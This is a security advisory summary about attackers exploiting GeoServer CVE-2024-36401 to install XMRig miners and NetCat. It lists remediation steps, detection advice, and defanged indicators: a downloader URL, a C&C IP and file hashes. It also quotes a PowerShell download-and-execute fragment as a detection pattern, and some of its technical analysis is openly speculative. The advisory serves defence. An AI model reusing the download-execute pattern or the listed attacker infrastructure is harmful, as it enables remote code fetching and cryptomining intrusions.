Full Report
AhnLab SEcurity intelligence Center (ASEC) has confirmed that the unpatched GeoServer is still under continuous attack. Threat actors are scanning for vulnerable GeoServer and installing CoinMiner. ASEC has also identified cases of infection in South Korea. 1. GeoServer Remote Code Execution Vulnerability (CVE-2024-36401) GeoServer is an open-source Geographic Information System (GIS) server written in […]
Analysis Summary
# Vulnerability: GeoServer Remote Code Execution Leading to CoinMiner Installation (CVE-2024-36401)
## CVE Details
- CVE ID: CVE-2024-36401
- CVSS Score: Not explicitly provided, but exploiting RCE typically implies High severity.
- CWE: Not explicitly provided, but the vulnerability allows for remote code execution.
## Affected Systems
- Products: GeoServer (Open-source Geographic Information System (GIS) server)
- Versions: Unpatched versions of GeoServer.
- Configurations: Environments running GeoServer on both Windows and Linux operating systems.
## Vulnerability Description
The vulnerability is a Remote Code Execution (RCE) flaw present in unpatched versions of GeoServer, which is written in Java. Successful exploitation allows an unauthorized remote attacker to execute arbitrary code on the underlying server. Threat actors, including Earth Baxia, have been noted actively targeting these systems to install malware, prominently CoinMiners (like XMRig) and remote access tools (like NetCat).
## Exploitation
- Status: Exploited in the wild (Continuous attacks confirmed by ASEC).
- Complexity: Implied to be relatively low given the sustained exploitation efforts by various threat actors.
- Attack Vector: Network (Remote).
## Impact
- Confidentiality: High (Achieving RCE allows for subsequent data theft, as seen with C&C activity).
- Integrity: High (System integrity is compromised by the installation of unauthorized software like NetCat and XMRig).
- Availability: Medium to High (System resources are consumed by coin mining activities, and the system can be leveraged for further attacks or denial of service).
## Remediation
### Patches
- Ensure GeoServer is updated to a version that contains the patch for CVE-2024-36401, as advised by the vendor. (Specific patched version not listed in source text).
### Workarounds
- **Network Isolation:** Restrict external access to the GeoServer instance to only necessary, trusted networks.
- **Process Monitoring:** Monitor running processes for unauthorized activity, especially PowerShell executions or Bash scripts spawning network connections, particularly those related to XMRig or NetCat.
- **Input Validation/Filtering:** If patching is delayed, review all input vectors into GeoServer if applicable, although this vulnerability likely stems from a core deserialization, command injection, or similar flaw often difficult to mitigate without a patch.
## Detection
- **Indicators of Compromise (IOCs):**
- **Files/Scripts:** Presence of files like `adminc.ps1` or XMRig/related mining binaries.
- **Persistence:** Presence of suspicious entries in Cron jobs (Linux) attempting to download data from external URLs.
- **Detection Methods and Tools:**
- Monitor for outbound network connections from the GeoServer process to external IP addresses making connections on non-standard ports (e.g., Monero mining pool traffic).
- Look for execution of long, obfuscated PowerShell commands initiated by the GeoServer process responsible for downloading and executing remote scripts (e.g., using `IEX(New-ObjectNet.WebClient).DownloadString(...)`).
- **Specific IOCs to block/monitor:**
- Hash: `0b3744373c32dc6de80dfc081200d9f8`, `310c17c19e90381114d47914bcb3ccf2`, etc.
- URL (Example downloader): hxxp://182[.]218[.]82[.]14/js/1/gw[.]txt
- IP (Example C&C/Distribution Node): 107[.]180[.]100[.]247
## References
- [Vendor Advisories]: Seek official GeoServer security advisories pertaining to CVE-2024-36401.
- [Relevant Links]:
- hxxps://www[.]fortinet[.]com/blog/threat-research/threat-actors-exploit-geoserver-vulnerability-cve-2024-36401
- hxxps://www[.]trendmicro[.]com/en_us/research/24/i/earth-baxia-spear-phishing-and-geoserver-exploit[.]html